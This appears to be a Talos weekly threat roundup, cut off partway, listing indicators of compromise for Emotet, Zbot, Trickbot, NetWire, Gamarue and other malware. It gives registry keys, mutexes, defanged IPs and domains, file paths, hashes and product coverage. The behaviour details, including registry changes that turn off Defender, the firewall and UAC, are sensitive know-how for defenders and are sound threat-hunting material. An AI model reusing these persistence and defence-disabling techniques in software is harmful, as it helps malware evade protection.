"[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 7 and Feb. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, [Snort.org](<https://www.snort.org/>), or [ClamAV.net](<https://www.clamav.net/>). \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/02/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7580217-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Packed.ZBot-7578445-1 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing. \nWin.Dropper.Trickbot-7582953-1 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.NetWire-7578556-0 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Packed.Gamarue-7580018-0 | Packed | Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud. \nWin.Trojan.Kovter-7581113-1 | Trojan | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nPUA.Win.Trojan.Bladabindi-7581164-0 | Trojan | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. \nWin.Packed.Ponystealer-7581286-0 | Packed | Ponystealer is known to be able to steal credentials from more than 100 different applications and may also install other malware such as a remote access tool (RAT). \nWin.Ransomware.Cerber-7582361-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, other file extensions are used. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7580217-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 20 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: c019706b ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 18 \n`Global\\M98B68E3C` | 18 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]195[.]228[.]95` | 3 \n`157[.]7[.]107[.]4` | 4 \n`190[.]228[.]29[.]115` | 3 \n`208[.]84[.]244[.]49` | 4 \n`105[.]187[.]200[.]240` | 4 \n`23[.]227[.]38[.]32` | 3 \n`72[.]18[.]130[.]169` | 3 \n`69[.]175[.]10[.]34` | 3 \n`83[.]143[.]28[.]130` | 4 \n`5[.]2[.]81[.]171` | 3 \n`41[.]191[.]232[.]22` | 4 \n`23[.]21[.]177[.]74` | 3 \n`89[.]97[.]236[.]171` | 3 \n`190[.]196[.]217[.]50` | 3 \n`195[.]57[.]58[.]70` | 4 \n`206[.]183[.]111[.]62` | 3 \n`192[.]185[.]181[.]168` | 4 \n`77[.]88[.]21[.]158` | 4 \n`87[.]250[.]255[.]212` | 3 \n`46[.]28[.]106[.]9` | 3 \n`77[.]88[.]21[.]37` | 3 \n`83[.]143[.]24[.]50` | 4 \n`86[.]96[.]229[.]28/31` | 3 \n`74[.]208[.]5[.]14/31` | 3 \n`173[.]194[.]204[.]108/31` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]outlook[.]com` | 3 \n`mail[.]outlook[.]com` | 3 \n`smtp[.]secureserver[.]net` | 4 \n`mailv[.]emirates[.]net[.]ae` | 3 \n`pop-mail[.]outlook[.]com` | 3 \n`pop[.]secureserver[.]net` | 3 \n`mail[.]secureserver[.]net` | 3 \n`secure[.]emailsrvr[.]com` | 3 \n`pop[.]yandex[.]com[.]tr` | 3 \n`smtp-mail[.]outlook[.]com` | 3 \n`outlook[.]office365[.]com` | 3 \n`mail[.]telkomsa[.]net` | 4 \n`smtp[.]yandex[.]com[.]tr` | 4 \n`mail[.]yandex[.]com` | 3 \n`mail[.]municipiodeyaguachi[.]gob[.]ec` | 3 \n`pop[.]vbn[.]co[.]bw` | 4 \n`mail[.]in[.]cpm-int[.]com` | 3 \n`mail[.]siajewellery[.]com` | 3 \n`mail[.]firstgourmet[.]com` | 3 \n`mail[.]lolipop[.]jp` | 3 \n`pop3[.]lolipop[.]jp` | 3 \n`mail[.]doves[.]co[.]za` | 3 \n`mail[.]vbn[.]co[.]bw` | 4 \n`smtp[.]vbn[.]co[.]bw` | 3 \n`mail[.]domverconsultants[.]com` | 3 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\298.exe` | 20 \n`%SystemRoot%\\SysWOW64\\AppIdPolicyEngineApi` | 1 \n`%SystemRoot%\\SysWOW64\\msctf` | 1 \n`%SystemRoot%\\SysWOW64\\cipher` | 1 \n`%SystemRoot%\\SysWOW64\\msftedit` | 1 \n`%SystemRoot%\\SysWOW64\\iprtrmgr` | 1 \n`%SystemRoot%\\SysWOW64\\xpsservices` | 1 \n`%SystemRoot%\\SysWOW64\\uexfat` | 1 \n`%ProgramData%\\UmCbkT.exe` | 1 \n`%SystemRoot%\\SysWOW64\\dhcpcmonitor` | 1 \n`%SystemRoot%\\SysWOW64\\psbase` | 1 \n`%SystemRoot%\\SysWOW64\\f3ahvoas` | 1 \n`%SystemRoot%\\SysWOW64\\XpsRasterService` | 1 \n`%SystemRoot%\\SysWOW64\\NlsData0414` | 1 \n`%SystemRoot%\\SysWOW64\\rnr20` | 1 \n`%SystemRoot%\\SysWOW64\\KBDIULAT` | 1 \n`%SystemRoot%\\SysWOW64\\KBDHE` | 1 \n`%TEMP%\\1A19.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\dhcpcore` | 1 \n`%TEMP%\\2D63.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\mydocs` | 1 \n`%SystemRoot%\\SysWOW64\\wininet` | 1 \n`%SystemRoot%\\SysWOW64\\twinui` | 1 \n`%SystemRoot%\\SysWOW64\\ureg` | 1 \n \n#### File Hashes\n\n` 0031f41b3edde21592bc42365e01689f23a73a634d7c8ffc0807e60e1a189a38 006766d9879f75d74de2c385ce8418fb838989af2046d8d329ad6ae7dc6d26eb 00efa3f945cfd76037639b91f2fd9208525eb377235440544c29e2c0d93a1c19 012b10d254c825b01bb0ae5f604bc59de7c0cac54bdd17b7f7dcd3e63ce89c66 024b77f2ff26f37e132e450a1d9a04fb94be78ecb0459afc5a09638efbec7cc5 02f55988f95d388efd2da064560eb349eab243dfc8eb806273850d707d74cb07 05c41c7550b30e8074e29985b3d4a75c209156334b93647f1e5d56a77cffc4f2 06a35e532b1e957c8fc2d44c2c370769fcc829479d90cb342b59dd7be17f58a1 0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b 0b878e218014a87bc4674a3f8c7113b207cf3e3203ba565c9e3fcf62cb5f18d6 0d45faaf1c2a3cd60340c2d9436fa60571f024ce17cb29089a538b3294aa8a3f 15d9234eeea6f729bd2a36b17e5cc5de58baa05a3ce2258675dd2620e4c28fb1 18195f809af26a3950879186304039c5592a8514671bb32cd6d45d7bf3014e4a 18c98bca74464c6bbe992bcffa838b6224e42419eac19e69ca0da0514968ccd6 18d15aa6b4831299695ceb06dd8ad7398dc48729314ecc0219a75833cc693dd4 196e94c02598dfcfaaf2b62c410c7d64eea908cc19c3af922277e2f1c5f3320f 19c05a961a7babe4bf5ef5889e358ba0df4b790a0b73544d5961bfef2e7d3451 1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1 21739583fe20050c9ea0aab5c23843a68b3d000a658b72f3148a98e4c0ba330d 2576c16870fedf186a782acae71056a381f01efbdd0c7df30a36daf526072368 26c3ffa34af8692430389b2132228ac0ad44b4a9cb2cf0a3c736468bf1ad1c1e 294233e4170042ad9ca33b8e5a227fc3e4033be090a25953a2d0e013f06e0a52 31522d4b3a684be27b58cddf1bf17be3f5cb34d5fc6fac0baba7b5d1aaf28e73 37cc6b1c356b5e15dd0fffc7ca4b58c760f02795ed47cff09e0b314951337a99 380fed9a967852beba37e632a51fce2a08f1c8b3b48330851a1fd40ac6dd1b84 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Kr_lhWjsnHc/XkbZhu7QZPI/AAAAAAAADRo/vKTi-82YNVQGvQD9whr9pi0XdMYh4TavACLcBGAsYHQ/s1600/1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-bs4E2rUzd_U/XkbjlVL9wHI/AAAAAAAADR0/fHbhDuyvOKgxS0kzjFLPEToFz2W8BPmmQCLcBGAsYHQ/s1600/929d633b1ce45a623bf4090c7fc7de3a9b4ef32febcbb4b2c1e4b3589a965538_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-j5fItW8khQM/XkbjrikkxzI/AAAAAAAADR4/vZs3fBvwVlEkaC5oFvNBAJLNQpb3RIsqQCLcBGAsYHQ/s1600/0d52884323396c99de2994a867ebe7ccb325a7a33a6ae3317f4290517232a3ed_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-iVZ0T5_U8iQ/XkbjyoFCH7I/AAAAAAAADR8/4P6m7lf034MouuYEH9GdYx30SXlc81-TgCLcBGAsYHQ/s1600/0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.ZBot-7578445-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: LoadAppInit_DLLs ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: AppInit_DLLs ` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\kvlcuie.dll` | 21 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\tfbkpde.exe` | 21 \n`%SystemRoot%\\Tasks\\kylaxsk.job` | 21 \n`%System32%\\Tasks\\aybbmte` | 25 \n`%ProgramData%\\Mozilla\\thfirxd.exe` | 25 \n`%ProgramData%\\Mozilla\\lygbwac.dll` | 25 \n \n#### File Hashes\n\n` 083229d33405150930a1d1cb416882532138571c5dc659afc9cd80c8770e62b8 0c3bd17a29727331d9381f47943c6950b9a01828a1f6337ba17ced510616fff6 156d95f97c320ce13dbbd675c1240447f207096eab813f0ca852c5bec63ee3b5 172985bcfe276d18762f3a0ac551d15f49885e956478bfcc08cf5524d326ea25 1965ff8d288665c76396b6029aeb1337972735a4610ba879cf7bd407fb2a8827 27fdacd8808b754d66dfafbff9e4fc2173a799a94c5251117fe17f3af1428c06 3dc7b1cc278e41b56b9cf23e4fc10a74ac2c62867beebdacaecb6ba8103f2679 3eb746e6a92be3a38280129157597eccdffa14b881667c4d42167d0fee7e9c36 41dbab1de30bba1ae12cd63c2fccee455f6ac304e8d8909b1e9a9c4df4894620 4e07f974bcd096ee7e4db358855054bad5de2d9f0ec7ab3e3ed4151a3be2f95c 59e9dfc13476d28583402405e503be73e433d16888c2485956634751b9ce525b 5a93627200929bd11b532a8ff6e1df06467af81e80a4aa967873c80cb7ed7c73 5ce641289dee052cf18a3b76b25d77a6fdfa11b794048d86ef31f32889cc8da5 633d2684a78baf37a289ba913060b65c06d47dbe96c91b79cfbf9042cf8353a5 67d7bd9279e73e5563afe27e0145ca66df510167af85cc56fe4172fb6da6f838 79e2d39c6357dc3a3b057f05d0f53bdbaf1e51db61dfde985bee7bc1e05ed33c 7b344ba74f11fe719b8321da501d86598ab43fdf6a662ee1aafe6cd829add6e1 7ceaa69cbffcffefdea99f110c7b031439b0ea8d9caa7f475f117c975989f65b 834fc5e70088fac0e7df245b20ca3319d692763ff28b6407e835cd38a8a4403b 84d61f9eecf8973c0f9815faaff6b676857d0c0065e584b48ba31f8985923317 87db422f9fdc1a6266e78fcf69d9339f5dd2a55288ccf35ad3239da5a6a22d0e 8c43aafc29a44c7b54f5b228961737018b65c949288e170c598810505658cac5 8c754e7edf8a2aecb6d3fec2cbe7e07135fc74beb7aed0e7f3544cdc67266c44 94211619fcc8304b7dabd5d683ee525774c3d9ac34ec7809da2ae27eeb62c49a a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-d6qrZYoKCdk/Xkbj_ntjiSI/AAAAAAAADSI/CW39wdcfw1s6Ko2RCER-1zBgGJIzq9YvQCLcBGAsYHQ/s1600/a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Trickbot-7582953-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 29 \n`Global\\785161C887210` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]32[.]21` | 1 \n`216[.]239[.]34[.]21` | 3 \n`216[.]239[.]36[.]21` | 2 \n`216[.]239[.]38[.]21` | 1 \n`104[.]20[.]17[.]242` | 1 \n`116[.]203[.]16[.]95` | 4 \n`50[.]19[.]116[.]122` | 1 \n`69[.]195[.]159[.]158` | 1 \n`190[.]214[.]13[.]2` | 14 \n`181[.]112[.]157[.]42` | 1 \n`181[.]113[.]28[.]146` | 1 \n`181[.]140[.]173[.]186` | 16 \n`119[.]252[.]165[.]75` | 1 \n`45[.]125[.]1[.]34` | 2 \n`54[.]235[.]203[.]7` | 1 \n`23[.]21[.]50[.]37` | 1 \n`198[.]8[.]91[.]10` | 3 \n`121[.]100[.]19[.]18` | 1 \n`171[.]100[.]142[.]238` | 1 \n`82[.]146[.]62[.]52` | 2 \n`5[.]182[.]210[.]246` | 2 \n`5[.]182[.]210[.]226` | 3 \n`51[.]89[.]115[.]116` | 5 \n`85[.]204[.]116[.]237` | 6 \n`93[.]189[.]42[.]146` | 7 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]myexternalip[.]com` | 1 \n`myexternalip[.]com` | 3 \n`icanhazip[.]com` | 1 \n`ip[.]anysrc[.]net` | 4 \n`api[.]ip[.]sb` | 2 \n`ipecho[.]net` | 2 \n`wtfismyip[.]com` | 1 \n`api[.]ipify[.]org` | 3 \n`ipinfo[.]io` | 2 \n`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 9 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\windirect` | 29 \n`%APPDATA%\\windirect\\settings.ini` | 29 \n`%APPDATA%\\windirect\\data` | 29 \n`%System32%\\Tasks\\Windows Direct core tools` | 29 \n`%SystemRoot%\\Tasks\\Windows Direct core tools.job` | 25 \n`%APPDATA%\\windirect\\bc434c1a3bd87c0cb40c31a3caac7831.exe` | 1 \n`%APPDATA%\\windirect\\7a2bd7d2423c2c83b3bc987c22da348c.exe` | 1 \n`%APPDATA%\\windirect\\a073a92c82bdad2dbdcba4bd1b322bdc.exe` | 1 \n`%APPDATA%\\windirect\\7baba02278378b0d739b212389d20c2c.exe` | 1 \n`%APPDATA%\\WINDIRECT\\<original file name>.exe` | 25 \n \n#### File Hashes\n\n` 007e9d94f91258cdc60ba3fd7df1ed56b00c7c08ecff19c484343ce95978c096 068f1532a0c7e9f564e92f9b093f4cf4a534ef9aa6ee0e6ec6b992beba9404f1 09edeec6283a7986081aeaa4715321a383d675dbfbd2486d01b7e5c9fd81dfc6 0a324fcc5e761067096e9f2161ce3da69c0836972cda72e8740532cc7e84866a 0b19441ced2510b94d977feac51406e3e2a9b9b68f6e8df7a8710c9df29ec8d9 0fe8b3586aa6098767690b4ee1b1fbb39d047fcd7a929d2726f634365eacc6a8 13a865d3702b86db5c13bf6190a03da070ca23c094f8d3c2818ef788655b695b 14fa94928f23ccdb90400c7628327649543d9fd9dae6e963b8c1d96e0ebf7699 184c8d777fe98828143da4f2d762d094475a5eaa9018f77a97e8aad7d5cc696d 1ee8f3dec5556746589f417e1553a7c5f63eca1bab55d5ec95a96feb5ceb7c20 24ce27efe076795d16b9530988cf7b66df89b1f5e1c170a43c509f19b7ca1f94 2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac 29346d7f7895e449a9b09135e2c05deddfddbe9db62db4eb8d33f8f458b13e7a 2b30cd5e49572f0ec94855d7d64ebb4ccfb89c0e2ce0804010a36b892a0e2d3d 2bab0171d0bcbb1be86ef7ea26aa76a10155978a84c08214b156e837a024372a 34e46ae12096f2a6f3aa9ccc9d59cb94ff0ef151da405f056f43b3b2eb9781b5 3c4bad8514148748ac20c348ad75e47633ee2723db56fb993503719390eeca75 3d9acac16267698fb1f3ac47d0d05a2dda4c4758e9b36c9e1644f89e041556ba 42a29cd7a6ce5a5f864a99968f85e7cb4b8d22383b7e194cfd0d558e463c7b70 46cad7db43d81067d78055680a8434ccf1090e3afbc52654ba4dd905038c7a9a 492425d2ab26c3d88845c3d3ee8c13cd7bef8fc893ec71f61881bd1cde33f358 499a4b0530fcff51c3f8703e727ba8fee36c19229be9a650cd5b7dad1d184a79 4cca83ef698b44352c95dc6b05dbaa1eca0521454179932bb4d8094c01133bfb 4d2be228e84f31aade8e7be4c37e05921e3f94297b2a45fe7fa2ca61d5e8dfbd 4d678fc86bacc1f3c53f7b96c814710a5029306be44a90d32c482719ff308b45 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-hoGu7FGpsQo/XkbkN2mLU2I/AAAAAAAADSM/oZbkfOhd1rAp7EtlUP7a9Znu0opqCjgKACLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-FN8MIbTAUL4/XkbkRiFG4_I/AAAAAAAADSU/zw7YKnWdnf0WTlI6755e2LX-ngnp1d1TwCLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.NetWire-7578556-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`88[.]198[.]117[.]83` | 25 \n \n#### File Hashes\n\n` 05848831206819b63dabd2116e673d28de675e62cf7d858fa4764bfc7a1e9b40 1504dfb0c30dd51fed5c8940d5103479ae565fba3d839f7d973925fa868a6097 17e436f6312f5cb021419beabb8985272593995ccc09110f27abfee1d1eed74e 18bb29e7f9fcc8410d0e613a4989d47b5f1b38023c26bb95a4fe5ae53c2f52ff 1a996582f6a9e60acc72d4266067c9e5ff48ac32bdb45fc8787cc366ff4bd790 27540988f360e65aa1ca42007c551fb73ab1b36ed5408ff098389b6ce3ac0f94 27fb4531c6056a49b297b20a24eafaceabb954aeb24dc00813e85884e2d0a5ce 2ace0152ad8eb298bcae92ebcf3c27c09ed25620c59642be684886bffee56ccb 3c1c1ccf871e10907e69945363ada929b5841d4d192a8422745c47731d33bcfd 3efa7242e48e0be611c350de170776f8537fec4e7c0105ec86e44a18e95db367 46988782ad1012c66e2de02140c2f5d4f210916b0ace64d5c29018336ba76668 4b8c0fcde33aedb55f6e087fd9526699f188f3e3030e33bd04cd8785b748ebe1 4e9562ec338b3e4dbaca5f30289881689f5e4ca5ef7fffb4afe73abe040213b2 5609f2f063ee870c77bfb1e2912d7d5080f85755e069a67c94a6258bebe5f367 5f446e1da31fd31ec83cb6fa2b26da3ae2821ca60273152079736006f498841e 610007b784ce5e7ffa2a2e646e60c72277a0222b2f18fb74eed55d25f1af37dc 6253c1a4ebbfba5de561219996ddc45af59f4ca3b35a3f95354f5ae91c78bbe0 68a0b82d1b3a21dcbd78de0bdb31f69e4afdb4c20750929d9959af168aa4457d 74a0bc89f2667f79264105d44c751d625fbc53ce5a12771134b9c32ca9e916c9 74b44c73bf6f45344bb4aef9f469b3ca92b76b6c0e479e126cab0e35f679c9ca 7caee05382db7f0819893217db61a70cb249d1de1530fedf80e56a9fabc445d6 7e00eca478b68881e4722e2aba2094e468b4b457515d4b8e247b624189ecfc65 8851b44b9e92689115050278bef0261926ecda761a19a566a73fa29de08bad69 89c33a22731e48e90417e2877e318c86a7ac57b5d9ba4c9a39bc65bf27191935 8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-komG9sMxszw/XkbkeNevidI/AAAAAAAADSc/kg9MJFg4Od4ZtqllEEqpWqFwGxDCzlNCgCLcBGAsYHQ/s1600/8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Gamarue-7580018-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: Load ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1081297374 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 1081297374 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Sidebars ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: twunk_16.exe ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Taskman ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Shell ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Update Manager ` | 1 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 1 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\MODULES ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\MODULES \nValue Name: Number ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\NOTEPAD \nValue Name: Body ` | 1 \nMutexes | Occurrences \n---|--- \n`alFSVWJB` | 2 \n`PuredairyBB9` | 1 \n`PuredairyBB10` | 1 \n`PuredairyBB2` | 1 \n`PuredairyBB4` | 1 \n`PuredairyBB8` | 1 \n`PuredairyBB7` | 1 \n`PuredairyBB6` | 1 \n`PuredairyBB15` | 1 \n`PuredairyBB14` | 1 \n`PuredairyBB13` | 1 \n`PuredairyBB12` 